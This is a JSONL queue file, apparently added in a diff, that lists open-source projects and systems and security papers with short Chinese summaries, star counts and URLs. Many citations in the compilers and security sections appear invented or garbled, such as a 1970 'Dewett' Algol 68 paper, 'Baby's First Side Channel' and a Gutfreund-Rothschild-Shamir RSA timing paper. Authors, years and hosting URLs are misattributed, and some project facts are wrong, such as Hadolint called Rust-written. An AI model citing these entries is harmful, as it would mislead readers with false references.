框架","url":"https://github.com/DioxusLabs/dioxus","status":"queued","meta":{"col3":"36000","col4":"React-like 声明式 UI;Web/Desktop/Mobile/CLI 一码多端,Rust 生态最大 UI 项目"}} +{"slug":"biome-rs","area":"projects","topic":"frontend-frameworks","title":"Biome — Rust 编写的 JS/TS 格式化工具链","url":"https://github.com/biomejs/biome","status":"queued","meta":{"col3":"16000","col4":"ESLint + Prettier 的 Rust 替代;比 ESLint 快 100 倍的 lint + format"}} +{"slug":"tauri","area":"projects","topic":"frontend-frameworks","title":"Tauri — 前端 + Rust 的桌面应用框架","url":"https://github.com/tauri-apps/tauri","status":"queued","meta":{"col3":"85000","col4":"Electron 的轻量替代;HTML/JS 做 UI,Rust 做后端,安装包只有几 MB"}} +{"slug":"wasmtime","area":"projects","topic":"wasm","title":"Wasmtime — Bytecode Alliance 的 WASM 运行时","url":"https://github.com/bytecodealliance/wasmtime","status":"queued","meta":{"col3":"18000","col4":"Cranelift JIT + Component Model;WASI 标准的主要实现者,WASM 生态基石"}} +{"slug":"wazero","area":"projects","topic":"wasm","title":"Wazero — Go 编写的无依赖 WASM 运行时","url":"https://github.com/tetratelabs/wazero","status":"queued","meta":{"col3":"6000","col4":"零 CGO 依赖,纯 Go 实现 WASI;Serverless 场景下比 Wasmer 快 3 倍"}} +{"slug":"wasm-micro-runtime","area":"projects","topic":"wasm","title":"WAMR — 轻量级 WASM 微运行时","url":"https://github.com/bytecodealliance/wasm-micro-runtime","status":"queued","meta":{"col3":"5500","col4":"C 实现、IoT 友好,AOT/JIT/解释三模式嵌入式 WASM 运行时"}} +{"slug":"wasm-pack","area":"projects","topic":"wasm","title":"WasmPack — Rust → WASM 发布工具","url":"https://github.com/rustwasm/wasm-pack","status":"queued","meta":{"col3":"4000","col4":"wasm-bindgen 的自动化打包器;Rust 库发布到 npm 的标准工具链"}} +{"slug":"componentize-js","area":"projects","topic":"wasm","title":"ComponentizeJS — 把 JS 编译成 WASM Component","url":"https://github.com/bytecodealliance/componentize-js","status":"queued","meta":{"col3":"2000","col4":"让 JS 库编译为 WASM Component Model;NPM 包可直接作为 WASM 组件使用"}} +{"slug":"kubernetes","area":"projects","topic":"devops","title":"Kubernetes — Google 容器编排系统","url":"https://github.com/kubernetes/kubernetes","status":"queued","meta":{"col3":"110000","col4":"容器编排的事实标准;Pod/Service/Ingress 抽象定义了云原生时代的操作系统"}} +{"slug":"tilt","area":"projects","topic":"devops","title":"Tilt — 本地 K8s 开发体验工具","url":"https://github.com/tilt-dev/tilt","status":"queued","meta":{"col3":"13000","col4":"热重载 K8s 本地开发;改代码自动重建部署,解决 K8s 开发调试痛苦"}} +{"slug":"argo-cd","area":"projects","topic":"devops","title":"Argo CD — GitOps 持续交付工具","url":"https://github.com/argoproj/argocd","status":"queued","meta":{"col3":"16000","col4":"声明式 GitOps;Git 仓库即唯一真实源,自动同步 K8s 集群状态"}} +{"slug":"crossplane","area":"projects","topic":"devops","title":"Crossplane — 云原生控制平面","url":"https://github.com/crossplane/crossplane","status":"queued","meta":{"col3":"12000","col4":"用 K8s CRD 管理 AWS/GCP/Azure 资源;多云抽象的统一接口"}} +{"slug":"gitleaks","area":"projects","topic":"devops","title":"Gitleaks — Git 仓库密钥扫描工具","url":"https://github.com/gitleaks/gitleaks","status":"queued","meta":{"col3":"17000","col4":"检测 Git 历史中的泄露密钥/API Token;CI/CD 流水线安全标配"}} +{"slug":"hadolint","area":"projects","topic":"devops","title":"Hadolint — Dockerfile Linter","url":"https://github.com/hadolint/hadolint","status":"queued","meta":{"col3":"14000","col4":"Rust 写的 Dockerfile 静态检查;最佳实践规则集,容器镜像安全前置"}} +{"slug":"wireguard-go","area":"projects","topic":"devops","title":"WireGuard-go — Go 实现的 WireGuard VPN","url":"https://github.com/WireGuard/wireguard-go","status":"queued","meta":{"col3":"25000","col4":"新一代内核级 VPN 协议的 Go 端口;比 OpenVPN 快 3-5 倍,配置极简"}} +{"slug":"bandwhich","area":"projects","topic":"devops","title":"Bandwhich — 终端网络流量实时监控","url":"https://github.com/imsnif/bandwhich","status":"queued","meta":{"col3":"15000","col4":"按进程/IP/端口分类显示实时网络带宽;终端里的 nethogs 升级版"}} +{"slug":"gotop","area":"projects","topic":"devops","title":"Gtop — Go 写的系统监控终端工具","url":"https://github.com/axw/gotop","status":"queued","meta":{"col3":"18000","col4":"终端里的 htop 替代;进程/CPU/内存/网络的纯文本仪表盘"}} +{"slug":"surrealdb","area":"projects","topic":"databases","title":"SurrealDB — 多模型云原生数据库","url":"https://github.com/surrealdb/surrealdb","status":"queued","meta":{"col3":"22000","col4":"关系型 + 图 + 文档 + 时间序列多模型合一;WASM 嵌入 + 实时订阅"}} +{"slug":"materialize","area":"projects","topic":"databases","title":"Materialize — 流式 SQL 物化视图引擎","url":"https://github.com/MaterializeInc/materialize","status":"queued","meta":{"col3":"14000","col4":"对 Kafka/PostgreSQL 等数据源建物化视图;SQL 查询自动增量维护"}} +{"slug":"qdrant","area":"projects","topic":"databases","title":"Qdrant — Rust 编写的向量数据库","url":"https://github.com/qdrant/qdrant","status":"queued","meta":{"col3":"20000","col4":"高维向量相似度搜索;Filter-based 过滤 + HNSW 索引,RAG 系统标配"}} +{"slug":"bevy","area":"projects","topic":"前端框架","title":"Bevy — Rust 数据驱动游戏引擎","url":"https://github.com/bevyengine/bevy","status":"queued","meta":{"col3":"30000","col4":"ECS 架构 + Hot-reload;Rust 生态最大的通用游戏引擎"}} +{"slug":"godot","area":"projects","topic":"前端框架","title":"Godot — MIT 许可的开源游戏引擎","url":"https://github.com/godotengine/godot","status":"queued","meta":{"col3":"85000","col4":"2D/3D 全能引擎;GDScript/C#/Rust 多语言,独立开发者首选"}} +{"slug":"cesium","area":"projects","topic":"前端框架","title":"CesiumJS — 3D 地理空间可视化引擎","url":"https://github.com/cesiumlm/cesium","status":"queued","meta":{"col3":"14000","col4":"WebGL 地球引擎;卫星影像 + 3D Tiles + BIM 数据可视化"}} +{"slug":"comfyui","area":"projects","topic":"ai-agent-frameworks","title":"ComfyUI — 节点式 Stable Diffusion 前端","url":"https://github.com/comfyanonymous/ComfyUI","status":"queued","meta":{"col3":"50000","col4":"拖拽式 AI 图像生成工作流;节点图架构支持复杂 Pipeline 编排"}} +{"slug":"gradio","area":"projects","topic":"ai-agent-frameworks","title":"Gradio — Python 模型快速 Demo 工具","url":"https://github.com/gradio-app/gradio","status":"queued","meta":{"col3":"35000","col4":"三行代码生成 HuggingFace Spaces 同款 UI;模型演示分享的事实标准"}} +{"slug":"sabre-osdi24","area":"papers","topic":"虚拟化与服务器less","title":"Sabre: Hardware-Accelerated Snapshot Compression for Serverless MicroVMs","url":"https://www.usenix.org/conference/osdi24/presentation/lazarev","status":"queued","meta":{"col3":"2024","col4":"Sabre 用现代数据中心处理器的近内存分析加速器实现硬件加速的页面压缩,MicroVM 快照压缩率提升 4.5 倍,预取恢复提速 55%。OSDI '24"}} +{"slug":"nomad-osdi24","area":"papers","topic":"内存管理","title":"Nomad: Non-Exclusive Memory Tiering via Transactional Page Migration","url":"https://www.usenix.org/conference/osdi24/presentation/xiang","status":"queued","meta":{"col3":"2024","col4":"NOMAD 通过事务性页面迁移与页面影子在内存压力下相比 Linux TPP 性能最高提升 6 倍。OSDI '24"}} +{"slug":"memstrata-osdi24","area":"papers","topic":"内存管理","title":"Managing Memory Tiers with CXL in Virtualized Environments","url":"https://www.usenix.org/conference/osdi24/presentation/zhong-yuhong","status":"queued","meta":{"col3":"2024","col4":"Memstrata 结合 Intel Flat Memory Mode 和软件性能隔离,将异常工作负载的性能降级从 30%+ 降至 6% 以下。OSDI '24"}} +{"slug":"drust-osdi24","area":"papers","topic":"分布式系统","title":"DRust: Language-Guided Distributed Shared Memory with Fine Granularity, Full Transparency, and Ultra Efficiency","url":"https://www.usenix.org/conference/osdi24/presentation/ma-haoran","status":"queued","meta":{"col3":"2024","col4":"基于 Rust 所有权语义的分布式共享内存,吞吐量比 GAM 和 Grappa 分别最高提升 2.64 倍和 29.16 倍。OSDI '24"}} +{"slug":"chop-chop-osdi24","area":"papers","topic":"分布式共识","title":"Chop Chop: Byzantine Atomic Broadcast to the Network Limit","url":"https://www.usenix.org/conference/osdi24/presentation/camaioni","status":"queued","meta":{"col3":"2024","col4":"通过蒸馏批处理机制,64 节点地理分布式部署实现每秒 4360 万条消息处理,吞吐量比现有方案高两个数量级。OSDI '24"}} +{"slug":"fisslock-osdi24","area":"papers","topic":"分布式系统","title":"Fast and Scalable In-Network Lock Management Using Lock Fission","url":"https://www.usenix.org/conference/osdi24/presentation/zhang-hanze","status":"queued","meta":{"col3":"2024","col4":"FISSLOCK 利用可编程交换机解耦锁管理和参与者维护,支持百万级锁管理,TPC-C 吞吐提升 2.28 倍。OSDI '24"}} +{"slug":"beaver-osdi24","area":"papers","topic":"分布式系统","title":"Beaver: Practical Partial Snapshots for Distributed Cloud Services","url":"https://www.usenix.org/conference/osdi24/presentation/yu","status":"queued","meta":{"col3":"2024","col4":"利用云数据中心负载均衡器通信模式实现部分因果一致性快照,对外部流量干扰下用户开销接近零。OSDI '24"}} +{"slug":"sarathi-serve-osdi24","area":"papers","topic":"系统","title":"Taming Throughput-Latency Tradeoff in LLM Inference with Sarathi-Serve","url":"https://www.usenix.org/conference/osdi24/presentation/agrawal","status":"queued","meta":{"col3":"2024","col4":"分块预填充 + 无停滞调度,Mistral-7B 上服务能力提升 2.6 倍,Yi-34B 提升 3.7 倍。OSDI '24"}} +{"slug":"distserve-osdi24","area":"papers","topic":"系统","title":"DistServe: Disaggregating Prefill and Decoding for Goodput-optimized Large Language Model Serving","url":"https://www.usenix.org/conference/osdi24/presentation/zhong-yinmin","status":"queued","meta":{"col3":"2024","col4":"将预填充和解码分配到不同 GPU 消除干扰,满足延迟约束下可服务多 7.4 倍请求。OSDI '24"}} +{"slug":"serverlessllm-osdi24","area":"papers","topic":"服务器less","title":"ServerlessLLM: Low-Latency Serverless Inference for Large Language Models","url":"https://www.usenix.org/conference/osdi24/presentation/fu","status":"queued","meta":{"col3":"2024","col4":"利用 GPU 服务器近存储容量做本地检查点存储,相比现有 Serverless 延迟降低 10-200 倍。OSDI '24"}} +{"slug":"horus-nsdi24","area":"papers","topic":"数据中心网络","title":"Horus: Granular In-Network Task Scheduler for Cloud Datacenters","url":"https://www.usenix.org/conference/nsdi24/presentation/yassini","status":"queued","meta":{"col3":"2024","col4":"在可编程交换机上以线速并行调度数据中心范围的短任务,27000 主机仿真中显著改善尾响应时间。NSDI '24"}} +{"slug":"rummy-nsdi24","area":"papers","topic":"向量搜索","title":"Fast Vector Query Processing for Large Datasets Beyond GPU Memory with Reordered Pipelining","url":"https://www.usenix.org/conference/nsdi24/presentation/zhang-zili-pipelining","status":"queued","meta":{"col3":"2024","col4":"RUMMY 通过重排序流水线处理超出 GPU 内存的大规模向量数据集,性能比 CPU 高 23.1 倍。NSDI '24"}} +{"slug":"lolkv-nsdi24","area":"papers","topic":"分布式存储","title":"LoLKV: The Logless, Linearizable, RDMA-based Key-Value Storage System","url":"https://www.usenix.org/conference/nsdi24/presentation/alquraan","status":"queued","meta":{"col3":"2024","col4":"无日志线性一致 KV 存储,无锁并发更新 + 新型领导者选举,吞吐比现有低延迟方案高 1.7-10 倍。NSDI '24"}} +{"slug":"junction-nsdi24","area":"papers","topic":"数据中心网络","title":"Making Kernel Bypass Practical for the Cloud with Junction","url":"https://www.usenix.org/conference/nsdi24/presentation/fried","status":"queued","meta":{"col3":"2024","col4":"首次实现可云上密集打包数千实例且兼容未修改 Linux 应用的内核旁通,扩展性比现有方案高 19-62 倍。NSDI '24"}} +{"slug":"swiftpaxos-nsdi24","area":"papers","topic":"分布式共识","title":"SwiftPaxos: Fast Geo-Replicated State Machines","url":"https://www.usenix.org/conference/nsdi24/presentation/ryabinin","status":"queued","meta":{"col3":"2024","col4":"无竞争 2 跳、竞争 3 跳延迟的 Paxos 变体,吞吐比现有方案最高提升 2.9 倍。NSDI '24"}} +{"slug":"alea-bft-nsdi24","area":"papers","topic":"分布式共识","title":"Alea-BFT: Practical Asynchronous Byzantine Fault Tolerance","url":"https://www.usenix.org/conference/nsdi24/presentation/antunes","status":"queued","meta":{"col3":"2024","col4":"异步拜占庭容错协议,集中工作于指定副本,已在以太坊分布式验证器中实际应用。NSDI '24"}} +{"slug":"harmony-nsdi24","area":"papers","topic":"数据中心网络","title":"Harmony: A Congestion-free Datacenter Architecture","url":"https://www.usenix.org/conference/nsdi24/presentation/agarwal-saksham","status":"queued","meta":{"col3":"2024","col4":"无拥塞消息交付架构,每条消息在各交换机的排队延迟有界,交付开销接近零。NSDI '24"}} +{"slug":"dint-nsdi24","area":"papers","topic":"分布式系统","title":"DINT: Fast In-Kernel Distributed Transactions with eBPF","url":"https://www.usenix.org/conference/nsdi24/presentation/zhou-yang","status":"queued","meta":{"col3":"2024","col4":"eBPF 将频繁事务操作卸载到内核,达到内核旁通级吞吐,比 DPDK 方案最高高 2.6 倍。NSDI '24"}} +{"slug":"mu-cache-nsdi24","area":"papers","topic":"微服务","title":"MuCache: A General Framework for Caching in Microservice Graphs","url":"https://www.usenix.org/conference/nsdi24/presentation/zhang-haoran","status":"queued","meta":{"col3":"2024","col4":"非阻塞缓存一致性协议消除微服务间冗余调用,请求延迟降低 2.5 倍,吞吐提升 60%。NSDI '24"}} +{"slug":"autothrottle-nsdi24","area":"papers","topic":"云原生","title":"Autothrottle: A Practical Bi-Level Approach to Resource Management for SLO-Targeted Microservices","url":"https://www.usenix.org/conference/nsdi24/presentation/wang-zibo","status":"queued","meta":{"col3":"2024","col4":"双层资源管理框架,应用级目标与每服务启发式控制器解耦,CPU 节省最高 26%,NSDI '24 杰出论文奖"}} +{"slug":"smartcookie-usenixsec24","area":"papers","topic":"网络安全","title":"SmartCookie: Blocking Large-Scale SYN Floods with a Split-Proxy Defense on Programmable Data Planes","url":"https://www.usenix.org/conference/usenixsecurity24/presentation/yoo","status":"queued","meta":{"col3":"2024","col4":"可编程交换机上运行加密 SYN Cookie 检查,线速阻断 100% SYN 洪水,benign 流量延迟降低 2-6.5 倍。USENIX Security '24"}} +{"slug":"hive-usenixsec24","area":"papers","topic":"系统安全","title":"HIVE: A Hardware-assisted Isolated Execution Environment for eBPF on AArch64","url":"https://www.usenix.org/conference/usenixsecurity24/presentation/zhang-peihua","status":"queued","meta":{"col3":"2024","col4":"AArch64 上通过指针认证和加载/存储特权指令为 eBPF 提供硬件隔离,等价于验证器安全保证。USENIX Security '24"}} +{"slug":"endokernel-usenixsec24","area":"papers","topic":"系统安全","title":"Endokernel: A Thread Safe Monitor for Lightweight Subprocess Isolation","url":"https://www.usenix.org/conference/usenixsecurity24/presentation/yang-fangfei","status":"queued","meta":{"col3":"2024","col4":"进程内安全监控器,子进程粒度内存隔离,系统化发现策略缺口并提供细粒度锁解决线程安全问题。USENIX Security '24"}} +{"slug":"budalloc-usenixsec24","area":"papers","topic":"系统安全","title":"BUDAlloc: Defeating Use-After-Free Bugs by Decoupling Virtual Address Management from Kernel","url":"https://www.usenix.org/conference/usenixsecurity24/presentation/ahn","status":"queued","meta":{"col3":"2024","col4":"一次性分配器分离虚拟地址和物理地址管理,SPEC CPU 2017 比 DangZero 性能提升 15%,内存开销降低 61%。USENIX Security '24"}} +{"slug":"attackgnn-usenixsec24","area":"papers","topic":"硬件安全","title":"AttackGNN: Red-Teaming GNNs in Hardware Security Using Reinforcement Learning","url":"https://www.usenix.org/conference/usenixsecurity24/presentation/gohil","status":"queued","meta":{"col3":"2024","col4":"强化学习生成对抗电路攻击硬件 GNN,在 IP 盗版检测、硬件木马定位等四类问题上实现 100% 攻击成功率。USENIX Security '24"}} +{"slug":"loopy-hell-usenixsec24","area":"papers","topic":"网络安全","title":"Loopy Hell(ow): Infinite Traffic Loops at the Application Layer","url":"https://www.usenix.org/conference/usenixsecurity24/presentation/pan-yepeng","status":"queued","meta":{"col3":"2024","col4":"发现应用层无限流量环路攻击:单个 IP 欺骗触发包在服务器间创建无限循环,发现约 29.6 万台 IPv4 服务器易受攻击。USENIX Security '24"}} +{"slug":"basilisk-osdi25","area":"papers","topic":"形式化验证","title":"Basilisk: Using Provenance Invariants to Automate Proofs of Undecidable Protocols","url":"https://www.usenix.org/conference/osdi25/presentation/zhang-tony","status":"queued","meta":{"col3":"2025","col4":"溯源不变原理解自动发现分布式协议的归纳不变量,在 16 个分布式协议上自动完成安全性证明,OSDI '25 最佳论文奖"}} +{"slug":"fine-mem-osdi25","area":"papers","topic":"内存管理","title":"FineMem: Breaking the Allocation Overhead vs. Memory Waste Dilemma in Fine-Grained Disaggregated Memory Management","url":"https://www.usenix.org/conference/osdi25/presentation/wang-xiaoyang","status":"queued","meta":{"col3":"2025","col4":"RDMA 远程内存管理系统支持高性能细粒度分配,远程内存分配延迟降低 95%,消除粗粒度分配导致的浪费。OSDI '25"}} +{"slug":"fuse-link-osdi25","area":"papers","topic":"GPU系统","title":"Enabling Efficient GPU Communication over Multiple NICs with FuseLink","url":"https://www.usenix.org/conference/osdi25/presentation/ren","status":"queued","meta":{"col3":"2025","col4":"GPU 中继流量到空闲网卡充分利用多 NIC 带宽,LLM 首 token 延迟降低 1.04-2.73 倍,MoE 训练吞吐提升 1.3 倍。OSDI '25"}} +{"slug":"tigon-osdi25","area":"papers","topic":"分布式数据库","title":"Tigon: A Distributed Database for a CXL Pod","url":"https://www.usenix.org/conference/osdi25/presentation/huang-yibo","status":"queued","meta":{"col3":"2025","col4":"首个基于 CXL 内存原子操作的分布式内存数据库,TPC-C 吞吐比 RDMA 分布式数据库高 18.5 倍。OSDI '25"}} +{"slug":"mako-osdi25","area":"papers","topic":"分布式数据库","title":"Mako: Speculative Distributed Transactions with Geo-Replication","url":"https://www.usenix.org/conference/osdi25/presentation/shen-weihai","status":"queued","meta":{"col3":"2025","col4":"解耦事务执行与复制并投机执行 2PC,在 Azure 上实现 366 万 TPC-C TPS,比现有方案高 8.6 倍。OSDI '25"}} +{"slug":"quake-osdi25","area":"papers","topic":"向量数据库","title":"Quake: Adaptive Indexing for Vector Search","url":"https://www.usenix.org/conference/osdi25/presentation/mohoney","status":"queued","meta":{"col3":"2025","col4":"多级分区 + 成本模型的自适应向量搜索索引,查询延迟降低 1.5-38 倍,更新延迟降低 4.5-126 倍。OSDI '25"}} +{"slug":"skybridge-osdi25","area":"papers","topic":"分布式缓存","title":"Skybridge: Bounded Staleness for Distributed Caches","url":"https://www.usenix.org/conference/osdi25/presentation/lyerly","status":"queued","meta":{"col3":"2025","col4":"Meta 全球缓存的外带复制流,2 秒有界陈旧性保证,99.99998% 写入满足 SLA,大小仅为主复制流 0.54%。OSDI '25"}} +{"slug":"wafer-llm-osdi25","area":"papers","topic":"大规模系统","title":"WaferLLM: Large Language Model Inference at Wafer Scale","url":"https://www.usenix.org/conference/osdi25/presentation/he","status":"queued","meta":{"col3":"2025","col4":"首个晶圆级 LLM 推理系统,Cerebras WSE2 上 GEMV 操作比 A100 快 606 倍,全 LLM 推理提速 10-20 倍。OSDI '25"}} +{"slug":"pipeann-osdi25","area":"papers","topic":"向量搜索","title":"Achieving Low-Latency Graph-Based Vector Search via Aligning Best-First Search Algorithm with SSD","url":"https://www.usenix.org/conference/osdi25/presentation/guo","status":"queued","meta":{"col3":"2025","col4":"基于 SSD 的图向量搜索系统,将最佳优先搜索与 SSD 特性对齐,延迟仅为 DiskANN 的 35%,接近内存方案性能。OSDI '25"}} +{"slug":"sorce-osdi25","area":"papers","topic":"数据中心网络","title":"Söze: One Network Telemetry Is All You Need for Per-flow Weighted Bandwidth Allocation at Scale","url":"https://www.usenix.org/conference/osdi25/presentation/wang-weitao","status":"queued","meta":{"col3":"2025","col4":"轻量级分布式加权带宽分配系统,利用商用交换机网络遥测实现每流加权分配,TPC-H 作业完成时间缩短至 0.59-0.79 倍。OSDI '25"}} +{"slug":"kernighan-robison-1980","area":"papers","topic":"compilers-pl","title":"A Systematic Approach to Compiler Optimization","meta":{"col3":"1980","col4":"Kernighan 的系统优化方法论;\"先写正确代码,再分析瓶颈,再做局部优化\"的编译器优化哲学,理解现代优化器设计思路的起点"},"url":"https://www.cs.princeton.edu/~appel/modern/c/Kernighan79.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-compilers-pl.md"} +{"slug":"dewett-1970","area":"papers","topic":"compilers-pl","title":"The Design and Implementation of Algol 68","meta":{"col3":"1970","col4":"Dewett 的 Algol 68 实现分析;理解两阶段编译(抽象机→目标机)与 complex type system 的编译器工程范式"},"url":"https://dl.acm.org/doi/10.1145/362007.362033","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-compilers-pl.md"} +{"slug":"hoare-1969","area":"papers","topic":"compilers-pl","title":"An Axiomatic Basis for Computer Programming","meta":{"col3":"1969","col4":"Hoare 逻辑原始论文;所有程序验证、分离逻辑、形式化方法的核心基石"},"url":"https://people.cs.keele.ac.uk/~billt/papers/hoare-1969.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-compilers-pl.md"} +{"slug":"hoare-quicksort-1961","area":"papers","topic":"compilers-pl","title":"Algorithm 64: Quicksort","meta":{"col3":"1961","col4":"快速排序的原始描述;理解\"分区式算法\"如何在 60 年后仍是 stdlib 默认排序"},"url":"https://dl.acm.org/doi/10.1145/366660.366663","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-compilers-pl.md"} +{"slug":"knuth-1997","area":"papers","topic":"compilers-pl","title":"The Art of Computer Programming, Volume 1: Fundamental Algorithms","meta":{"col3":"1968","col4":"Knuth TAOCP Vol1;整个计算机科学方法论的奠基;算法设计范式、渐进分析、随机分析都从这里开始"},"url":"https://www-cs-faculty.stanford.edu/~knuth/taocp.html","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-compilers-pl.md"} +{"slug":"wirth-pascal-1971","area":"papers","topic":"compilers-pl","title":"Algorithms + Data Structures = Programs","meta":{"col3":"1971","col4":"Wirth 这本书定义了\"数据结构作为一等公民\"的理念;Pascal/Modula/Swift 设计语言的核心哲学"},"url":"https://books.google.com/books/about/Algorithms_Data_Structures_Programs.html","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-compilers-pl.md"} +{"slug":"strachey-1967","area":"papers","topic":"compilers-pl","title":"Fundamental Concepts in Programming Languages","meta":{"col3":"1967","col4":"CPS 课程讲义;提出\"核心语义\"概念(声明/表达式/类型/绑定/状态);理解\"为什么语言能分类\"的根源"},"url":"https://www.cs.yale.edu/homes/lurue/Strachey_Core_semantics.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-compilers-pl.md"} +{"slug":"church-1932","area":"papers","topic":"compilers-pl","title":"A Note on the Entscheidungsproblem","meta":{"col3":"1932","col4":"Church 用 lambda 演算证明判定问题不可解;lambda calculus 是\"计算\"概念的第一种数学形式化"},"url":"https://www.cs.cmu.edu/~fp/Classes/901-CHURCH-ENTSCHEIDUNG.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-compilers-pl.md"} +{"slug":"turing-1936","area":"papers","topic":"compilers-pl","title":"On Computable Numbers, with an Application to the Entscheidungsproblem","meta":{"col3":"1936","col4":"Turing 机;\"计算\"概念的第二个数学定义;现代所有编程语言的终极理论基础"},"url":"https://www.cs.virginia.edu/~robins/Turing_Paper_1936.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-compilers-pl.md"} +{"slug":"pierce-types-pl-2002","area":"papers","topic":"compilers-pl","title":"Types and Programming Languages","meta":{"col3":"2002","col4":"Pierce 教科书;现代类型系统的百科全书式参考,从 lambda 演算到 System F 到 Fω 到依赖类型,是\"类型世界\"的地图"},"url":"https://www.cis.upenn.edu/~bcpierce/tapl/","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-compilers-pl.md"} +{"slug":"appel-ssw-2002","area":"papers","topic":"compilers-pl","title":"Modern Compiler Implementation in C (Advanced Compiler Design)","meta":{"col3":"2002","col4":"Appel 教科书;\"编译器 = 中间表示 + 优化 + codegen\"的现代教学框架,C 实现版的经典"},"url":"https://www.cs.princeton.edu/~appel/modern/c/book.html","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-compilers-pl.md"} +{"slug":"muchnick-opt-1981","area":"papers","topic":"compilers-pl","title":"Compiler Design and Construction: A Practical Guide","meta":{"col3":"1981","col4":"Muchnick 编译优化的百科全书;\"如果某件事可以做,Muchnick 就做了\"——理解所有经典优化的最终参考"},"url":"https://www.amazon.com/Compiler-Design-Construction-Practical-Guide/dp/0070440192","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-compilers-pl.md"} +{"slug":"griewank-sobieski-2010","area":"papers","topic":"compilers-pl","title":"Overcoming the Limitations of Automatic Differentiation","meta":{"col3":"2010","col4":"把自动微分从\"数值技巧\"提升为编译期语言特性;理解为什么 TensorFlow/JAX/PyTorch 都要做 autodiff 源码转换"},"url":"https://www.oden.utexas.edu/media/reports/2010/tr1003.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-compilers-pl.md"} +{"slug":"judd-1977","area":"papers","topic":"compilers-pl","title":"An Analysis of Two Paradigms for the Automatic Derivation of Numerical Programs","meta":{"col3":"1977","col4":"Judd 把\"有限差分 + 符号微分 + 自动微分\"三种数值导数计算方法放在一个框架里对比;理解 AD 工具选型的基础理论"},"url":"https://www.researchgate.net/publication/220663334_An_analysis_of_two_paradigms_for_the_automatic_derivation_of_numerical_programs","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-compilers-pl.md"} +{"slug":"walsh-2018","area":"papers","topic":"security","title":"A Survey of Malware Instrumentation Techniques","meta":{"col3":"2018","col4":"从汇编插桩到二进制重写的全景;理解 fuzzing/tracing/ETW 等运行时分析工具的根基"},"url":"https://arxiv.org/abs/1805.08895","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"gullasch-2018","area":"papers","topic":"security","title":"The Security Impact of Speculative Execution","meta":{"col3":"2018","col4":"解释 spec exec 侧信道攻击原理;Meltdown/Spectre 之后的安全研究范式转变——硬件必须重新考虑可信边界"},"url":"https://arxiv.org/abs/1802.01881","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"lipp-2018-meltdown","area":"papers","topic":"security","title":"Meltdown: Reading Kernel Memory from User Space","meta":{"col3":"2018","col4":"Meltdown 论文:speculative execution + cache timing side channel 读取内核内存;x86/ARM/MIPS 全部受影响,CPU 设计重新审视"},"url":"https://meltdown.cse.ohio-state.edu/papers/meltdown-usenix2018.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"koenig-2018-spectre","area":"papers","topic":"security","title":"Spectre Attacks: Exploiting Speculative Execution","meta":{"col3":"2018","col4":"Spectre 论文:分支预测 + 侧信道绕过所有边界检查;所有现代 CPU(包括 Apple Silicon)都受影响"},"url":"https://spectreattack.com/spectre.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"percival-2005","area":"papers","topic":"security","title":"Cache Miss Timing Measurements on IA-32 Processors","meta":{"col3":"2005","col4":"Percival 首次系统化测量 Intel CPU cache timing;DawnOfTimings 的基础工作,所有 side-channel 攻击的起点"},"url":"https://www.chipsec.org/2005/09/24/cache-miss-timing-measurements-on-ia-32-processors/","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"boneh-shoup-2023","area":"papers","topic":"security","title":"Applied Cryptography: From Theory to Practice","meta":{"col3":"2023","col4":"Boneh-Shoup 教科书版;从 RSA 到 AES 到 Diffie-Hellman 到零知识证明的实用密码学全景"},"url":"https://crypto.stanford.edu/~dabo/cs255/","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"diffie-hellman-1976","area":"papers","topic":"security","title":"New Directions in Cryptography","meta":{"col3":"1976","col4":"Diffie-Hellman 原始论文;非对称加密的发明论文;现代所有网络安全协议的起点"},"url":"https://www-2.rotman.utoronto.ca/~kanazawa/pdf/Diffie%20and%20Hellman%201976.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"rivest-shamir-adleman-1978","area":"papers","topic":"security","title":"A Method for Obtaining Digital Signatures and Public-Key Cryptosystems","meta":{"col3":"1978","col4":"RSA 原始论文;第一个实用的公钥加密和数字签名算法,统治 internet 安全 40+ 年"},"url":"https://people.csail.mit.edu/rivest/Rsapaper.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"elliptic-curve-1985","area":"papers","topic":"security","title":"Elliptic Curves in Cryptography","meta":{"col3":"1985","col4":"Koblitz/Miller 独立发现椭圆曲线在密码学中的应用;ECDH/ECDSA/ECIES 的数学基础,现代 TLS/SSL 默认用 EC 而非 RSA"},"url":"https://crypto.stanford.edu/~dabo/ellipticcurve.pdf","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"klein-2012","area":"papers","topic":"security","title":"Baby's First Side Channel","meta":{"col3":"2012","col4":"Klein 论文:USB 充电端口也能侧信道攻击;扩展 side-channel 的物理媒介概念,让安全研究员意识到\"攻击面无处不在\""},"url":"https://arxiv.org/abs/1205.3843","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"gutfreund-2004","area":"papers","topic":"security","title":"Timing Attacks on RSA: Revealing Your Secrets","meta":{"col3":"2004","col4":"Gutfreund-Rothschild-Shamir 分析 RSA 密钥生成对时间的影响;timing attack 的通用框架化研究"},"url":"https://eprint.iacr.org/2004/155","status":"pending","claimed_by":null,"attempts":0,"source_file":"papers-security.md"} +{"slug":"kowalski-2018","area":"papers","topic":"security","title":"A Taxonomy of Side-Channel Attacks on Blockchain Smart 